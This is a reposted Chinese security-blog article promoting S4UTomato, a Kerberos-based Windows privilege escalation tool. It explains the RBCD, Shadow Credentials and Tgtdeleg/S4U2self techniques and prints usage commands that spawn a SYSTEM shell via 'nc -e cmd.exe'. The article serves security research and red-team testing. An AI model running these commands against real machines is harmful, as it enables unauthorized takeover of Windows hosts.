声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。 |
现在只对常读和星标的公众号才展示大图推送,建议大家把Hack分享吧“设为星标”,否则可能看不到了!
hw攻防演练期间,工具安全性自测!
Kerberos
“Potato”的早期利用技术几乎相同:利用COM接口的某些功能,欺骗NT AUTHORITYSYSTEM帐户连接并验证到攻击者控制的RPC服务器。
然后,通过一系列 API 调用,在此身份验证过程中执行中间(NTLM 中继)攻击,从而为本地系统上的 NT AUTHORITYSYSTEM 帐户生成访问令牌。最后这个token被窃取,使用CreateProcessWithToken()和CreateProcessAsUser()函数传递token并创建一个新的进程来获取SYSTEM权限。
在此之前,我们需要获取本地机器帐户的TGT(Ticket Granting Ticket)。这并不容易,因为服务帐户权限施加的限制使我们无法获取计算机的长期密钥,从而无法构造 KRB_AS_REQ 请求。为了实现上述目标,我利用了三种技术:Resource-based Constrained Delegation、Shadow Credentials 和Tgtdeleg。作者基于 Rubeus工具集构建了这个项目。
使用示例
C:UserswhoamiDesktop>S4UTomato.exe --help
S4UTomato
1.0
.0
-beta
Copyright (c)
2023
-d, --Domain Domain (FQDN) to authenticate to.
-s, --Server Host name
of
domain controller or LDAP server.
-m, --ComputerName The
new
computer account to create.
-p, --ComputerPassword The password
of
the
new
computer account to be created.
-f, --Force Forcefully update the
'msDS-KeyCredentialLink'
attribute
of
the computer
object.
-c, --Command Program to run.
-v, --Verbose Output verbose debug information.
--help Display
this
help screen.
--version Display version information.
利用Resource-based Constrained Delegation的LEP:
S4UTomato
.exe
rbcd
-m
NEWCOMPUTER
-p
pAssw0rd
-c
"
nc
.exe
127
.0
.0
.1
4444
-e
cmd
.exe
"
利用Shadow Credentials + S4U2self的LEP:
S4UTomato
.exe
shadowcred
-c
"
nc
127
.0
.0
.1
4444
-e
cmd
.exe
"
-f
利用Tgtdeleg + S4U2self的LEP:
#
First
retrieve
the
TGT
through
Tgtdeleg
S4UTomato
.exe
tgtdeleg
#
Then
run
SCMUACBypass
to
obtain
SYSTEM
privilege
S4UTomato
.exe
krbscm
-c
"
nc
127
.0
.0
.1
4444
-e
cmd
.exe
"
下载地址
原文始发于微信公众号(Hack分享吧):S4UTomato!Kerberos提权利用工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论